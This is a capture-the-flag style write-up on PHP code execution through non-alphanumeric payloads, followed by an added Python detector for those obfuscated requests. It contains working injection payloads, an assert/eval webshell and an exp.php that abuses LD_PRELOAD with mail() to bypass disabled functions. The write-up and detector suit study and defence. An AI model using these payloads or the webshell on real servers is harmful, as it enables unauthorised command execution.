Code execution. Letters and digits are filtered, so the function name has to be built with either XOR or bitwise NOT; both work:
code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo
Most of the command-execution functions turn out to be disabled, so the next step is getting around that. There are two ways.
① AntSword plugin
First construct a webshell:
code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=eval($_POST[%27a%27]);
The flag cannot be read directly; reading /readflag shows it is a binary file.
② LD_PRELOAD + mail(): hijack a shared object (.so) to execute system commands
Location of the bypass_disablefunc_x64.so file:
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
Upload exp.php:
<?php
// exp.php
$cmd = "/readflag";
$out_path = "/tmp/1.txt";
// command line that the preloaded .so reads and runs in the child process
$evil_cmdline = $cmd . " > " . $out_path . " 2>&1";
putenv("EVIL_CMDLINE=" . $evil_cmdline);
$so_path = "/tmp/bypass_disablefunc_x64.so";
// the dynamic loader honours LD_PRELOAD when mail() spawns sendmail
putenv("LD_PRELOAD=" . $so_path);
mail("", "", "", "");
echo "<p> <b>output</b>: <br />" . nl2br(file_get_contents($out_path)) . "</p>";
unlink($out_path);
?>
code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=include%20%22/tmp/exp.php%22;
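From the defender's side, the three payloads above are easy to miss in access logs because the function names never appear as plain text. The following Python script is an added example, not part of this writeup or of the linked repository: it percent-decodes a query string, undoes the PHP bitwise-NOT (~(...)) and XOR (${"a"^"b"}) string constructs to recover the literal they encode, and then flags any sensitive function name that appears in the decoded request. The sample requests are constructed from the payloads shown above plus one benign request for comparison; the list of sensitive names is an assumption you would tune for your own application.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample requests, modelled on the payloads shown in this writeup
# (not captured traffic). The last one is a benign request for comparison.
SAMPLE_REQUESTS = [
    "code=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo",
    "code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=eval($_POST[%27a%27]);",
    "code=$_=~(%A0%B8%BA%AB);${$_}[__](${$_}[___]);&__=assert&___=include%20%22/tmp/exp.php%22;",
    "page=about&lang=en",
]

# PHP bitwise NOT applied to a string literal: ~("...") flips every byte.
NOT_RE = re.compile(rb"~\(([^()]*)\)")
# PHP XOR between two string literals inside a variable-variable: ${"a" ^ "b"}.
XOR_RE = re.compile(rb"\$\{([^{}^]+)\^([^{}]+)\}")
# Function names whose appearance in a decoded request is worth an alert (assumed list).
SENSITIVE = ("assert", "eval", "include", "putenv", "mail", "phpinfo", "system")


def parse_query(query: str) -> dict:
    """Split a raw query string into {key_bytes: value_bytes}, percent-decoding both."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_to_bytes(key)] = unquote_to_bytes(value)
    return params


def deobfuscate(value: bytes) -> tuple:
    """Return (rewritten value, recovered literals) for the NOT and XOR constructs."""
    recovered = []

    def not_sub(m):
        plain = bytes(b ^ 0xFF for b in m.group(1))
        recovered.append(plain)
        return b'"' + plain + b'"'

    def xor_sub(m):
        # PHP XORs byte-wise up to the length of the shorter operand; zip() does the same.
        plain = bytes(a ^ b for a, b in zip(m.group(1), m.group(2)))
        recovered.append(plain)
        return b'${"' + plain + b'"}'

    value = NOT_RE.sub(not_sub, value)
    value = XOR_RE.sub(xor_sub, value)
    return value, recovered


def analyze_request(query: str) -> dict:
    """Decode one query string and report obfuscation and sensitive function names."""
    params = parse_query(query)
    decoded = {}
    recovered = []
    for key, value in params.items():
        plain, found = deobfuscate(value)
        decoded[key] = plain
        recovered.extend(found)
    # Check every decoded value, not only the code parameter: the payloads above
    # pass the real function name through a second parameter such as __=assert.
    blob = b" ".join(decoded.values()).lower()
    hits = sorted(name for name in SENSITIVE if name.encode() in blob)
    return {
        "obfuscated": bool(recovered),
        "recovered": [r.decode("latin-1") for r in recovered],
        "sensitive": hits,
        "decoded": {k.decode("latin-1"): v.decode("latin-1") for k, v in decoded.items()},
    }


if __name__ == "__main__":
    for q in SAMPLE_REQUESTS:
        r = analyze_request(q)
        verdict = "ALERT" if r["obfuscated"] or r["sensitive"] else "ok"
        print(f"{verdict:5} recovered={r['recovered']} sensitive={r['sensitive']}")
```

For the first three samples the script recovers the literal `_GET` and reports phpinfo, assert/eval and assert/include respectively; the benign request produces no findings. The same decoding can be applied to POST bodies. On the mitigation side, note that the LD_PRELOAD step only works because putenv() and mail() remain callable even though the command-execution functions are disabled, which is why putenv is usually added to disable_functions alongside them.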
References on LD_PRELOAD + mail() .so hijacking:
https://www.freebuf.com/articles/web/192052.html
https://www.anquanke.com/post/id/175403#h2-0
https://imagin.vip/?p=508
https://www.cnblogs.com/yesec/p/12483631.html
https://blog.csdn.net/crisprx/article/details/104349608